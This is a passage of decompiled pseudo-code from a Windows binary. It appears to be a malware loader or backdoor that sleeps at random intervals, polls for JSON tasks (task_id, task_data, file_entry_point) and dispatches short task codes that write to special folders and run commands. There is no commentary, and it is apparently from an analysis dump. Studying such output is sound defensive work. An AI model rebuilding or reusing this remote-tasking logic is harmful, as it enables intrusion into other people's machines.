                				_t209 = _t1824 - 0x70; // -109
                				E000002152152059A7F0(0, 0, _t1042, 1, _t969 -  *((intOrPtr*)(_t1824 + 0xd8)) -  *((intOrPtr*)(_t1824 + 0xd0)) >> 6, 0x2067e1e0, _t209, ( *0x206830a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)), 0xffffffff, 0x2067d140, _t1824, ( *0x206830a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)) + 0x20, _t1900, _t1912);
                				if ( *(_t1824 - 0x60) != 0) goto 0x2058a885;
                				r8d = E00000215215205FAB54(_t1826 + 0x50);
                				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                				r8d = r8d + 0x19;
                				_t988 = r8d * 0x3e8;
                				Sleep(??);
                				_t1276 =  *((intOrPtr*)(_t1824 - 0x58));
                				if (_t1276 - 0x10 < 0) goto 0x2058a813;
                				_t1458 =  *((intOrPtr*)(_t1824 - 0x70));
                				if (_t1276 + 1 - _t1921 < 0) goto 0x2058a80e;
                				if ((_t988 & 0x0000001f) != 0) goto 0x2058b944;
                				_t1278 =  *((intOrPtr*)(_t1458 - 8));
                				if (_t1278 - _t1458 >= 0) goto 0x2058b93e;
                				_t1459 = _t1458 - _t1278;
                				if (_t1459 - 8 < 0) goto 0x2058b938;
                				if (_t1459 - 0x27 > 0) goto 0x2058b932;
                				0x205f51e4();
                				 *((long long*)(_t1824 - 0x58)) = 0xf;
                				 *(_t1824 - 0x60) = _t1918;
                				 *((char*)(_t1824 - 0x70)) = 0;
                				_t1279 =  *(_t1824 - 0x78);
                				if (_t1279 - 0x10 < 0) goto 0x2058a86f;
                				_t1461 =  *((intOrPtr*)(_t1826 + 0x70));
                				if (_t1279 + 1 - _t1921 < 0) goto 0x2058a86a;
                				if ((_t988 & 0x0000001f) != 0) goto 0x2058b95c;
                				_t1281 =  *((intOrPtr*)(_t1461 - 8));
                				if (_t1281 - _t1461 >= 0) goto 0x2058b956;
                				_t1462 = _t1461 - _t1281;
                				if (_t1462 - 8 < 0) goto 0x2058b950;
                				if (_t1462 - 0x27 > 0) goto 0x2058b94a;
                				0x205f51e4();
                				 *(_t1824 - 0x78) = 0xf;
                				 *(_t1824 - 0x80) = _t1918;
                				 *((char*)(_t1826 + 0x70)) = 0;
                				goto 0x2058a6c0;
                				if ( *(_t1826 + 0x60) == 0) goto 0x2058a8db;
                				_t1718 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				_t236 = _t1824 + 0x650; // 0x653
                				E0000021521520581080(_t236,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				_t237 = _t1824 - 0x70; // -109
                				_t1720 =  >=  ?  *((void*)(_t1824 - 0x70)) : _t237;
                				r8d =  *(_t1824 - 0x60);
                				_t241 = _t1824 + 0x650; // 0x653
                				_t778 = E0000021521520581420( *((long long*)(_t1824 - 0x58)) - 0x10, _t241,  >=  ?  *((void*)(_t1824 - 0x70)) : _t237);
                				_t242 = _t1824 + 0x650; // 0x653
                				E0000021521520581290(_t778, _t242);
                				 *(_t1824 + 0xf0) = _t1281;
                				 *(_t1824 + 0xf8) = _t1281;
                				 *((intOrPtr*)(_t1824 + 0xfe)) = r14w;
                				asm("xorps xmm0, xmm0");
                				asm("movdqa [ebp+0x100], xmm0");
                				asm("xorps xmm1, xmm1");
                				asm("movdqa [ebp+0x110], xmm1");
                				asm("movdqa [ebp+0x120], xmm0");
                				 *(_t1824 + 0x130) = _t1918;
                				 *((long long*)(_t1824 + 0x138)) = 0x400;
                				 *(_t1824 + 0x140) = r14d;
                				 *(_t1824 + 0x148) = _t1918;
                				if ( *(_t1824 + 0x100) != _t1281) goto 0x2058a96e;
                				E00000215215205F4DCC(_t1281, _t242);
                				 *(_t1824 + 0x4c8) = _t1281;
                				 *_t1281 = _t1918;
                				_t1281[1] = 0x10000;
                				_t1281[2] = _t1918;
                				_t1281[3] = _t1918;
                				_t1281[4] = _t1918;
                				 *(_t1824 + 0x100) = _t1281;
                				 *(_t1824 + 0x108) = _t1281;
                				_t259 = _t1824 - 0x70; // -109
                				_t1722 =  >=  ?  *((void*)(_t1824 - 0x70)) : _t259;
                				_t262 = _t1824 + 0xf0; // 0xf3
                				E000002152152058CF30(0x2067e1e0, _t262,  >=  ?  *((void*)(_t1824 - 0x70)) : _t259, 0x2067d140);
                				if (_t1281[0xa] == 0) goto 0x2058aa9a;
                				r8d = E00000215215205FAB54(_t1281);
                				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                				r8d = r8d + 0x19;
                				_t991 = r8d * 0x3e8;
                				Sleep(??);
                				if ( *(_t1824 + 0x108) == 0) goto 0x2058a9d2;
                				E000002152152058C610(0x2067e1e0,  *(_t1824 + 0x108));
                				0x205faea4();
                				E00000215215205F51EC(_t1281, 0x2067e1e0, 0x2067d140);
                				_t1282 =  *((intOrPtr*)(_t1824 - 0x58));
                				if (_t1282 - 0x10 < 0) goto 0x2058aa39;
                				_t1471 =  *((intOrPtr*)(_t1824 - 0x70));
                				if (_t1282 + 1 - _t1921 < 0) goto 0x2058aa34;
                				if ((_t991 & 0x0000001f) != 0) goto 0x2058b974;
                				_t1284 =  *((intOrPtr*)(_t1471 - 8));
                				if (_t1284 - _t1471 >= 0) goto 0x2058b96e;
                				_t1472 = _t1471 - _t1284;
                				if (_t1472 - 8 < 0) goto 0x2058b968;
                				if (_t1472 - 0x27 > 0) goto 0x2058b962;
                				0x205f51e4();
                				 *((long long*)(_t1824 - 0x58)) = 0xf;
                				 *(_t1824 - 0x60) = _t1918;
                				 *((char*)(_t1824 - 0x70)) = 0;
                				_t1285 =  *(_t1824 - 0x78);
                				if (_t1285 - 0x10 < 0) goto 0x2058a86f;
                				_t1474 =  *((intOrPtr*)(_t1826 + 0x70));
                				if (_t1285 + 1 - _t1921 < 0) goto 0x2058a86a;
                				if ((_t991 & 0x0000001f) != 0) goto 0x2058b98c;
                				_t1287 =  *((intOrPtr*)(_t1474 - 8));
                				if (_t1287 - _t1474 >= 0) goto 0x2058b986;
                				_t1475 = _t1474 - _t1287;
                				if (_t1475 - 8 < 0) goto 0x2058b980;
                				if (_t1475 - 0x27 > 0) goto 0x2058b97a;
                				goto 0x2058a867;
                				_t1820 =  *((intOrPtr*)(_t1824 - 0x30));
                				E000002152152058CA80(0x2067e1e0, _t1820,  *((intOrPtr*)(_t1824 - 0x28)), ( *0x206830a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)) + 0x20);
                				_t1922 = _t1820;
                				 *((long long*)(_t1824 - 0x28)) = _t1820;
                				if ( *((short*)(_t1824 + 0xfe)) != 3) goto 0x2058b7f0;
                				_t1289 =  *(_t1824 + 0xf8) & 0xffffffff;
                				_t1368 = (0x2067e1e0 << 5) + _t1289;
                				_t290 = _t1824 + 0x4c0; // 0x4c3
                				_t291 = _t1824 + 0xf0; // 0xf3
                				E000002152152058C830(1, _t1368, _t291, _t290, _t1820, _t1824, "response_status");
                				if ( *_t1289 == _t1368) goto 0x2058ab49;
                				 *(_t1824 + 0x38) = _t1289;
                				 *(_t1824 + 0x40) = _t1289;
                				 *((short*)(_t1824 + 0x46)) = 0x405;
                				_t1292 =  *(_t1824 + 0x40) & 0x00000000 | "response_status";
                				 *(_t1824 + 0x40) = _t1292;
                				 *(_t1824 + 0x38) = 0xf;
                				_t298 = _t1824 + 0x38; // 0x3b
                				_t299 = _t1824 + 0xf0; // 0xf3
                				E000002152152058CE20(_t299, _t298, 0xffffffff, _t1820, _t1824, _t1918, _t1922);
                				r12d =  *_t1292;
                				 *(_t1824 + 0x9d0) = r12d;
                				_t1294 =  *(_t1824 + 0xf8) & 0xffffffff;
                				_t1370 = (_t1368 << 5) + _t1294;
                				_t303 = _t1824 + 0x4b8; // 0x4bb
                				_t304 = _t1824 + 0xf0; // 0xf3
                				E000002152152058C830(1, _t1370, _t304, _t303, _t1820, _t1824, "tasks");
                				if ( *_t1294 == _t1370) goto 0x2058b0dd;
                				 *(_t1824 + 0x48) = _t1294;
                				 *(_t1824 + 0x50) = _t1294;
                				 *((short*)(_t1824 + 0x56)) = 0x405;
                				_t1297 =  *(_t1824 + 0x50) & 0x00000000 | "tasks";
                				 *(_t1824 + 0x50) = _t1297;
                				 *(_t1824 + 0x48) = 5;
                				_t311 = _t1824 + 0x48; // 0x4b
                				_t312 = _t1824 + 0xf0; // 0xf3
                				E000002152152058CE20(_t312, _t311, 0xffffffff, _t1820, _t1824, _t1918, _t1922);
                				if ( *((short*)(_t1297 + 0xe)) != 4) goto 0x2058b0dd;
                				 *(_t1824 + 0x58) = _t1297;
                				 *(_t1824 + 0x60) = _t1297;
                				 *((short*)(_t1824 + 0x66)) = 0x405;
                				 *(_t1824 + 0x60) =  *(_t1824 + 0x60) & 0x00000000 | "tasks";
                				 *(_t1824 + 0x58) = 5;
                				_t320 = _t1824 + 0x58; // 0x5b
                				_t321 = _t1824 + 0xf0; // 0xf3
                				_t798 = E000002152152058CE20(_t321, _t320, 0xffffffff, _t1820, _t1824, _t1918, _t1922);
                				_t322 = _t1824 + 0x260; // 0x263
                				E000002152152058C4B0(_t798,  *(_t1824 + 0x60) & 0x00000000 | "tasks", _t322);
                				_t1301 =  *((intOrPtr*)(_t1824 + 0x260));
                				_t1812 = _t1301[2] & 0xffffffff;
                				r14d =  *_t1301;
                				_t1920 = (_t1918 << 4) + _t1812;
                				if (_t1812 == _t1920) goto 0x2058b0d7;
                				r13d = 0;
                				 *(_t1824 + 0x3a0) = _t1917;
                				 *(_t1824 + 0x3a8) = _t1917;
                				 *(_t1824 + 0x3a8) = 0xf;
                				 *(_t1824 + 0x3a0) = _t1917;
                				 *((char*)(_t1824 + 0x390)) = 0;
                				 *(_t1824 + 0x3c8) = _t1917;
                				 *(_t1824 + 0x3d0) = _t1917;
                				 *(_t1824 + 0x3d0) = 0xf;
                				 *(_t1824 + 0x3c8) = _t1917;
                				 *((char*)(_t1824 + 0x3b8)) = 0;
                				 *(_t1824 + 0x3e8) = _t1917;
                				 *(_t1824 + 0x3f0) = _t1917;
                				 *(_t1824 + 0x3f0) = 0xf;
                				 *(_t1824 + 0x3e8) = _t1917;
                				 *((char*)(_t1824 + 0x3d8)) = 0;
                				 *(_t1824 + 0x408) = _t1917;
                				 *(_t1824 + 0x410) = _t1917;
                				 *(_t1824 + 0x410) = 0xf;
                				 *(_t1824 + 0x408) = _t1917;
                				 *((char*)(_t1824 + 0x3f8)) = 0;
                				if ( *((short*)(_t1812 + 0xe)) != 3) goto 0x2058b07e;
                				_t1303 =  *(_t1812 + 8) & 0xffffffff;
                				_t1372 = (_t1370 << 5) + _t1303;
                				_t347 = _t1824 + 0x4b0; // 0x4b3
                				E000002152152058C830(1, _t1372, _t1812, _t347, _t1820, _t1824, "task_data");
                				if ( *_t1303 == _t1372) goto 0x2058adb9;
                				 *(_t1824 + 0x28) = _t1303;
                				 *(_t1824 + 0x30) = _t1303;
                				 *((short*)(_t1824 + 0x36)) = 0x405;
                				_t1306 =  *(_t1824 + 0x30) & 0x00000000 | "task_data";
                				 *(_t1824 + 0x30) = _t1306;
                				 *(_t1824 + 0x28) = 9;
                				_t354 = _t1824 + 0x28; // 0x2b
                				E000002152152058CE20(_t1812, _t354, _t1812, _t1820, _t1824, _t1920, _t1922);
                				if (( *(_t1306 + 0xe) & 0x00001000) != 0) goto 0x2058ad8e;
                				_t1308 =  *(_t1306 + 8) & 0xffffffff;
                				if ( *_t1308 != 0) goto 0x2058ad98;
                				goto 0x2058adaa;
                				if ( *((char*)(_t1308 + (_t1917 | 0xffffffff) + 1)) != 0) goto 0x2058ada0;
                				_t360 = _t1824 + 0x3b8; // 0x3bb
                				E0000021521520586B10(_t1372, _t360, _t1308, _t1820, (_t1917 | 0xffffffff) + 1);
                				_t1310 =  *(_t1812 + 8) & 0xffffffff;
                				_t1374 = (_t1372 << 5) + _t1310;
                				_t362 = _t1824 + 0x4a8; // 0x4ab
                				E000002152152058C830(1, _t1374, _t1812, _t362, _t1820, _t1824, "task");
                				if ( *_t1310 == _t1374) goto 0x2058ae69;
                				 *(_t1824 + 0x68) = _t1310;
                				 *(_t1824 + 0x70) = _t1310;
                				 *((short*)(_t1824 + 0x76)) = 0x405;
                				_t1313 =  *(_t1824 + 0x70) & 0x00000000 | "task";
                				 *(_t1824 + 0x70) = _t1313;
                				 *(_t1824 + 0x68) = 4;
                				_t369 = _t1824 + 0x68; // 0x6b
                				E000002152152058CE20(_t1812, _t369, _t1812, _t1820, _t1824, _t1920, _t1922);
                				if (( *(_t1313 + 0xe) & 0x00001000) != 0) goto 0x2058ae40;
                				_t1315 =  *(_t1313 + 8) & 0xffffffff;
                				if ( *_t1315 != 0) goto 0x2058ae4a;
                				goto 0x2058ae5a;
                				if ( *((char*)(_t1315 + (_t1917 | 0xffffffff) + 1)) != 0) goto 0x2058ae50;
                				_t375 = _t1824 + 0x390; // 0x393
                				E0000021521520586B10(_t1374, _t375, _t1315, _t1820, (_t1917 | 0xffffffff) + 1);
                				_t1317 =  *(_t1812 + 8) & 0xffffffff;
                				_t1376 = (_t1374 << 5) + _t1317;
                				_t377 = _t1824 + 0x4d0; // 0x4d3
                				E000002152152058C830(1, _t1376, _t1812, _t377, _t1820, _t1824, "task_id");
                				if ( *_t1317 == _t1376) goto 0x2058aeee;
                				 *(_t1824 + 0x78) = _t1317;
                				 *(_t1824 + 0x80) = _t1317;
                				 *((short*)(_t1824 + 0x86)) = 0x405;
                				_t1320 =  *(_t1824 + 0x80) & 0x00000000 | "task_id";
                				 *(_t1824 + 0x80) = _t1320;
                				 *(_t1824 + 0x78) = 7;
                				_t384 = _t1824 + 0x78; // 0x7b
                				E000002152152058CE20(_t1812, _t384, _t1812, _t1820, _t1824, _t1920, _t1922);
                				 *((intOrPtr*)(_t1824 + 0x3b0)) =  *_t1320;
                				_t1322 =  *(_t1812 + 8) & 0xffffffff;
                				_t1378 = (_t1376 << 5) + _t1322;
                				_t387 = _t1824 + 0x4a0; // 0x4a3
                				E000002152152058C830(1, _t1378, _t1812, _t387, _t1820, _t1824, "file_entry_point");
                				if ( *_t1322 == _t1378) goto 0x2058afb9;
                				 *(_t1824 + 0x88) = _t1322;
                				 *(_t1824 + 0x90) = _t1322;
                				 *((short*)(_t1824 + 0x96)) = 0x405;
                				_t1325 =  *(_t1824 + 0x90) & 0x00000000 | "file_entry_point";
                				 *(_t1824 + 0x90) = _t1325;
                				 *(_t1824 + 0x88) = 0x10;
                				_t394 = _t1824 + 0x88; // 0x8b
                				E000002152152058CE20(_t1812, _t394, _t1812, _t1820, _t1824, _t1920, _t1922);
                				if (( *(_t1325 + 0xe) & 0x00001000) != 0) goto 0x2058af8a;
                				_t1327 =  *(_t1325 + 8) & 0xffffffff;
                				if ( *_t1327 != 0) goto 0x2058af94;
                				goto 0x2058afaa;
                				if ( *((char*)(_t1327 + (_t1917 | 0xffffffff) + 1)) != 0) goto 0x2058afa0;
                				_t400 = _t1824 + 0x3d8; // 0x3db
                				_t818 = E0000021521520586B10(_t1378, _t400, _t1327, _t1820, (_t1917 | 0xffffffff) + 1);
                				_t401 = _t1824 + 0x390; // 0x393
                				if (_t401 - _t1922 >= 0) goto 0x2058b039;
                				_t402 = _t1824 + 0x390; // 0x393
                				if (_t1820 - _t402 > 0) goto 0x2058b039;
                				_t403 = _t1824 + 0x390; // 0x393
                				if (_t1922 !=  *(_t1824 - 0x20)) goto 0x2058b010;
                				_t409 = _t1824 - 0x30; // -45
                				E000002152152058C510(_t818 * (_t403 - _t1820), _t409);
                				_t1923 =  *((intOrPtr*)(_t1824 - 0x28));
                				 *((long long*)(_t1824 + 0x268)) = _t1923;
                				 *((long long*)(_t1824 + 0x270)) = _t1923;
                				if (_t1923 == 0) goto 0x2058b037;
                				_t821 = E000002152152058D0C0(_t1327 >> 3 >> 0x3f, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t1923, ((_t1327 >> 3) + (_t1327 >> 3 >> 0x3f) + ((_t1327 >> 3) + (_t1327 >> 3 >> 0x3f)) * 8 << 4) +  *((intOrPtr*)(_t1824 - 0x30)),  *((intOrPtr*)(_t1824 - 0x30)), _t1900);
                				goto 0x2058b073;
                				if (_t1923 !=  *(_t1824 - 0x20)) goto 0x2058b050;
                				_t417 = _t1824 - 0x30; // -45
                				E000002152152058C510(_t821, _t417);
                				_t1924 =  *((intOrPtr*)(_t1824 - 0x28));
                				_t1822 =  *((intOrPtr*)(_t1824 - 0x30));
                				 *((long long*)(_t1824 + 0x270)) = _t1924;
                				 *((long long*)(_t1824 + 0x268)) = _t1924;
                				if (_t1924 == 0) goto 0x2058b073;
                				_t422 = _t1824 + 0x390; // 0x393
                				_t823 = E000002152152058D0C0(_t1327 >> 3 >> 0x3f, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t1924, _t422, _t1822, _t1900);
                				_t1925 = _t1924 + 0x90;
                				 *((long long*)(_t1824 - 0x28)) = _t1925;
                				_t424 = _t1824 + 0x3f8; // 0x3fb
                				_t824 = E0000021521520586820(_t823, 0x1000, _t424);
                				_t425 = _t1824 + 0x3d8; // 0x3db
                				_t825 = E0000021521520586820(_t824, 0x1000, _t425);
                				_t426 = _t1824 + 0x3b8; // 0x3bb
                				_t826 = E0000021521520586820(_t825, 0x1000, _t426);
                				_t427 = _t1824 + 0x390; // 0x393
                				E0000021521520586820(_t826, 0x1000, _t427);
                				if (_t1812 + 0x10 != _t1920) goto 0x2058ac60;
                				r12d =  *(_t1824 + 0x9d0);
                				r13d = 3;
                				goto 0x2058b0da;
                				r14d = 0;
                				if (r12d != 1) goto 0x2058b7f0;
                				if (_t1822 != _t1925) goto 0x2058b201;
                				r8d = E00000215215205FAB54(_t1327 >> 3 >> 0x3f);
                				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                				r8d = r8d + 0x19;
                				_t996 = r8d * 0x3e8;
                				Sleep(??);
                				if ( *(_t1824 + 0x108) == 0) goto 0x2058b12f;
                				E000002152152058C610((_t1327 >> 3) + (_t1327 >> 3 >> 0x3f),  *(_t1824 + 0x108));
                				0x205faea4();
                				E00000215215205F51EC(_t1327 >> 3 >> 0x3f, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t1822);
                				_t1333 =  *((intOrPtr*)(_t1824 - 0x58));
                				r15d = 0x1000;
                				if (_t1333 - 0x10 < 0) goto 0x2058b1a0;
                				_t1522 =  *((intOrPtr*)(_t1824 - 0x70));
                				if (_t1333 + 1 - _t1925 < 0) goto 0x2058b19b;
                				if ((_t996 & 0x0000001f) != 0) goto 0x2058b9a4;
                				_t1335 =  *((intOrPtr*)(_t1522 - 8));
                				if (_t1335 - _t1522 >= 0) goto 0x2058b99e;
                				_t1523 = _t1522 - _t1335;
                				if (_t1523 - 8 < 0) goto 0x2058b998;
                				if (_t1523 - 0x27 > 0) goto 0x2058b992;
                				0x205f51e4();
                				 *((long long*)(_t1824 - 0x58)) = 0xf;
                				 *(_t1824 - 0x60) = _t1920;
                				 *((char*)(_t1824 - 0x70)) = 0;
                				_t1336 =  *(_t1824 - 0x78);
                				if (_t1336 - 0x10 < 0) goto 0x2058a86f;
                				_t1525 =  *((intOrPtr*)(_t1826 + 0x70));
                				if (_t1336 + 1 - _t1925 < 0) goto 0x2058a86a;
                				if ((_t996 & 0x0000001f) != 0) goto 0x2058b9bc;
                				_t1338 =  *((intOrPtr*)(_t1525 - 8));
                				if (_t1338 - _t1525 >= 0) goto 0x2058b9b6;
                				_t1526 = _t1525 - _t1338;
                				if (_t1526 - 8 < 0) goto 0x2058b9b0;
                				if (_t1526 - 0x27 > 0) goto 0x2058b9aa;
                				goto 0x2058a867;
                				r12d = 0;
                				_t450 = _t1824 + 0x98; // 0x9b
                				E0000021521520586430(__esp, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t450, _t1822 + 0x28);
                				_t1816 =  *((intOrPtr*)(_t1822 + 0x18));
                				if (_t1816 - 0x10 < 0) goto 0x2058b230;
                				goto 0x2058b233;
                				_t1382 =  *((intOrPtr*)(_t1822 + 0x10));
                				_t1867 =  <  ? _t1382 : _t1917;
                				_t1173 =  <  ? _t1382 : _t1917;
                				if (( <  ? _t1382 : _t1917) == 0) goto 0x2058b25b;
                				if (E00000215215205F9A30(_t996, _t1822, "shi",  <  ? _t1382 : _t1917) != 0) goto 0x2058b30e;
                				if (_t1382 != 3) goto 0x2058b30e;
                				r8d = 0x208;
                				E00000215215205F8EF0(_t996, 0, _t1042, __esp, 0x206830b0, "shi", _t1816,  <  ? _t1382 : _t1917);
                				E00000215215205FAB54(_t1338);
                				r9d = 0;
                				_t459 = _t1900 + 0x26; // 0x26
                				r8d = _t459;
                				__imp__SHGetSpecialFolderPathA();
                				lstrcatA(??, ??);
                				 *((long long*)(_t1824 + 0x1f0)) = _t1338;
                				 *((long long*)(_t1824 + 0x1f8)) = _t1338;
                				 *((long long*)(_t1824 + 0x200)) = _t1338;
                				_t465 = _t1824 + 0x1f0; // 0x1f3
                				E00000215215205C7750(_t1338, _t1382, _t465, _t1816, _t1822, _t1900);
                				if ( *((intOrPtr*)(_t1824 + 0x200)) == 0) goto 0x2058b270;
                				_t467 = _t1824 + 0x98; // 0x9b
                				E0000021521520587AE0(_t1338,  *((intOrPtr*)(_t1824 + 0x1f0)),  *((intOrPtr*)(_t1824 + 0x1f8)), _t467, _t1917);
                				goto 0x2058b3ee;
                				if (_t1816 - 0x10 < 0) goto 0x2058b319;
                				goto 0x2058b31c;
                				_t1870 =  <  ? _t1382 : _t1917;
                				_t1179 =  <  ? _t1382 : _t1917;
                				if (( <  ? _t1382 : _t1917) == 0) goto 0x2058b340;
                				if (E00000215215205F9A30(0, _t1822, "dij",  <  ? _t1382 : _t1917) != 0) goto 0x2058b40b;
                				if (_t1382 != 3) goto 0x2058b40b;
                				r8d = 0x208;
                				E00000215215205F8EF0(0, 0, _t1042, __esp, 0x206830b0, "dij", _t1816,  <  ? _t1382 : _t1917);
                				_t845 = E00000215215205FAB54(_t1338);
                				r9d = 0;
                				_t476 = _t1900 + 0x26; // 0x26
                				r8d = _t476;
                				__imp__SHGetSpecialFolderPathA();
                				lstrcatA(??, ??);
                				 *((long long*)(_t1824 + 0x208)) = _t1338;
                				 *((long long*)(_t1824 + 0x210)) = _t1338;
                				 *((long long*)(_t1824 + 0x218)) = _t1338;
                				_t482 = _t1824 + 0x208; // 0x20b
                				E00000215215205C7750(_t1338, _t1382, _t482, _t1816, _t1822, _t1900);
                				if ( *((intOrPtr*)(_t1824 + 0x218)) == 0) goto 0x2058b351;
                				_t485 = _t1824 + 0x98; // 0x9b
                				_t851 = E0000021521520587CB0(_t1382,  *((intOrPtr*)(_t1824 + 0x208)),  *((intOrPtr*)(_t1824 + 0x210)), _t1822, _t1824, _t485, _t1822 + 0x48);
                				r12d = 0;
                				if (_t851 == 0) goto 0x2058b796;
                				 *(_t1822 + 0x88) = 1;
                				goto 0x2058b796;
                				if (_t1816 - 0x10 < 0) goto 0x2058b416;
                				goto 0x2058b419;
                				_t1873 =  <  ? _t1382 : _t1917;
                				_t1186 =  <  ? _t1382 : _t1917;
                				if (( <  ? _t1382 : _t1917) == 0) goto 0x2058b439;
                				if (E00000215215205F9A30(0, _t1822, "dex",  <  ? _t1382 : _t1917) != 0) goto 0x2058b4b6;
                				if (_t1382 != 3) goto 0x2058b4b6;
                				r9d = 0;
                				r8d = _t1382 + 0x19;
                				__imp__SHGetSpecialFolderPathA();
                				lstrcatA(??, ??);
                				_t490 = _t1824 + 0x98; // 0x9b
                				_t1763 =  >=  ?  *((void*)(_t1824 + 0x98)) : _t490;
                				r8d =  *(_t1824 + 0xa8);
                				if (E00000215215205CA9C8(_t1338, _t1382, 0x206830b0,  >=  ?  *((void*)(_t1824 + 0x98)) : _t490, _t1822, _t1822 + 0x48) == 0) goto 0x2058b796;
                				E00000215215205CB510(_t854, 1, _t1382, 0x206830b0,  >=  ?  *((void*)(_t1824 + 0x98)) : _t490);
                				 *(_t1822 + 0x88) = 1;
                				goto 0x2058b796;
                				if (_t1816 - 0x10 < 0) goto 0x2058b4c1;
                				goto 0x2058b4c4;
                				_t1875 =  <  ? _t1382 : _t1917;
                				_t1193 =  <  ? _t1382 : _t1917;
                				if (( <  ? _t1382 : _t1917) == 0) goto 0x2058b4e4;
                				if (E00000215215205F9A30(0, _t1822, "sdl",  <  ? _t1382 : _t1917) != 0) goto 0x2058b501;
                				if (_t1382 - 3 >= 0) goto 0x2058b4ef;
                				goto 0x2058b4f9;
                				if ((r12d & 0xffffff00 | _t1382 - 0x00000003 > 0x00000000) == 0) goto 0x2058bb86;
                				if (E0000021521520587E00(_t1382, _t1822, "ins") == 0) goto 0x2058b56b;
                				if ( *(_t1824 + 0x9c8) == 0) goto 0x2058b52c;
                				0x20589d60();
                				goto 0x2058b796;
                				 *(_t1826 + 0x20) = 0;
                				_t499 = _t1824 + 0x150; // 0x153
                				_t500 = _t1824 + 0x1b0; // 0x1b3
                				_t501 = _t1824 + 0x4f8; // 0x4fb
                				_t502 = _t1824 + 0x298; // 0x29b
                				if (E0000021521520587ED0(_t845 - "dij" + "dij" * 2, 0xe1, _t1382, _t502, _t501, _t1816, _t1822, _t500, _t499, 0x2063af30) != 0) goto 0x2058b9c2;
                				0x20589d60();
                				goto 0x2058b796;
                				if (E0000021521520587E00(_t1382, _t1822, "gdt") == 0) goto 0x2058b796;
                				_t503 = _t1824 + 0x5b0; // 0x5b3
                				E00000215215205868F0(_t503, "\r", _t500);
                				_t504 = _t1824 + 0x630; // 0x633
                				E00000215215205868F0(_t504, 0x2063cf6e, _t500);
                				_t505 = _t1824 + 0x98; // 0x9b
                				_t506 = _t1824 + 0x5b0; // 0x5b3
                				_t507 = _t1824 + 0x630; // 0x633
                				_t865 = E00000215215205C80C0(_t1338, _t1382, _t507, _t506, _t1822, _t1824, _t505, 0x2063af30, _t1917, _t1925);
                				_t508 = _t1824 + 0x630; // 0x633
                				_t866 = E0000021521520586820(_t865, 0, _t508);
                				_t509 = _t1824 + 0x5b0; // 0x5b3
                				E0000021521520586820(_t866, 0, _t509);
                				r8b = 0xa;
                				_t510 = _t1824 + 0x98; // 0x9b
                				_t511 = _t1824 + 0x338; // 0x33b
                				_t868 = E00000215215205C802C(_t1382, _t511, _t510);
                				_t512 = _t1824 + 8; // 0xb
                				_t869 = E0000021521520586930(_t868, _t512);
                				_t1383 =  *((intOrPtr*)(_t1824 + 0x338));
                				_t1817 =  *((intOrPtr*)(_t1824 + 0x340));
                				if (_t1383 == _t1817) goto 0x2058b778;
                				asm("o16 nop [eax+eax]");
                				_t515 = _t1824 + 0x350; // 0x353
                				_t870 = E0000021521520586930(_t869, _t515);
                				_t516 = _t1824 + 0x2f8; // 0x2fb
                				E0000021521520586930(_t870, _t516);
                				_t517 = _t1824 + 0x5f0; // 0x5f3
                				E00000215215205868F0(_t517, 0x2063cf6e, _t505);
                				_t518 = _t1824 + 0x5d0; // 0x5d3
                				E00000215215205868F0(_t518, 0x2063cf6e, _t505);
                				_t519 = _t1824 + 0x2f8; // 0x2fb
                				 *(_t1826 + 0x20) = _t519;
                				_t521 = _t1824 + 0x350; // 0x353
                				_t522 = _t1824 + 0x5f0; // 0x5f3
                				_t523 = _t1824 + 0x5d0; // 0x5d3
                				r14b = E00000215215205BA9E0(_t845 - "dij" + "dij" * 2, 0, 0xe1, _t1042, 1, _t1383 - _t1817, _t1383, _t1383, _t523, _t1817, _t1822, _t1824, _t522, _t521, _t1920) == 0;
                				_t524 = _t1824 + 0x5d0; // 0x5d3
                				_t875 = E0000021521520586820(_t874, 0, _t524);
                				_t525 = _t1824 + 0x5f0; // 0x5f3
                				E0000021521520586820(_t875, 0, _t525);
                				if (r14b == 0) goto 0x2058b710;
                				if ( *((long long*)(_t1824 + 0x360)) == 0) goto 0x2058b710;
                				_t527 = _t1824 + 0x518; // 0x51b
                				E00000215215205893D0(_t1383, _t527, "Command : ", _t1822, _t1824, _t1383, _t521);
                				_t528 = _t1824 + 8; // 0xb
                				_t878 = E00000215215205888F0(0, _t1383, _t528, _t519, _t521);
                				_t529 = _t1824 + 0x518; // 0x51b
                				E0000021521520586820(_t878, 0, _t529);
                				_t530 = _t1824 + 8; // 0xb
                				E0000021521520586730(0xa, _t1383, _t530, _t1817);
                				_t531 = _t1824 + 0x350; // 0x353
                				_t532 = _t1824 + 8; // 0xb
                				E00000215215205888F0(0, _t1383, _t532, _t531, _t521);
                				_t533 = _t1824 + 8; // 0xb
                				_t882 = E0000021521520586730(0xa, _t1383, _t533, _t1817);
                				_t534 = _t1824 + 0x2f8; // 0x2fb
                				_t883 = E0000021521520586820(_t882, 0, _t534);
                				_t535 = _t1824 + 0x350; // 0x353
                				_t884 = E0000021521520586820(_t883, 0, _t535);
                				_t1384 = _t1383 + 0x20;
                				if (_t1383 + 0x20 != _t1817) goto 0x2058b620;
                				_t536 = _t1824 + 8; // 0xb
                				E0000021521520587DF0(_t884, _t536);
                				r8d =  *(_t1824 + 0x18);
                				_t538 = _t1824 + 0x318; // 0x31b
                				E0000021521520586200(__esp, _t519, _t1383 + 0x20, _t538, _t519);
                				_t887 = E0000021521520588900(0, _t1383 + 0x20, _t1822 + 0x68, _t519);
                				_t540 = _t1824 + 0x318; // 0x31b
                				_t888 = E0000021521520586820(_t887, 0, _t540);
                				 *(_t1822 + 0x88) = 1;
                				goto 0x2058b77f;
                				 *(_t1822 + 0x88) = r13d;
                				_t543 = _t1824 + 8; // 0xb
                				E0000021521520586820(_t888, 0, _t543);
                				_t544 = _t1824 + 0x338; // 0x33b
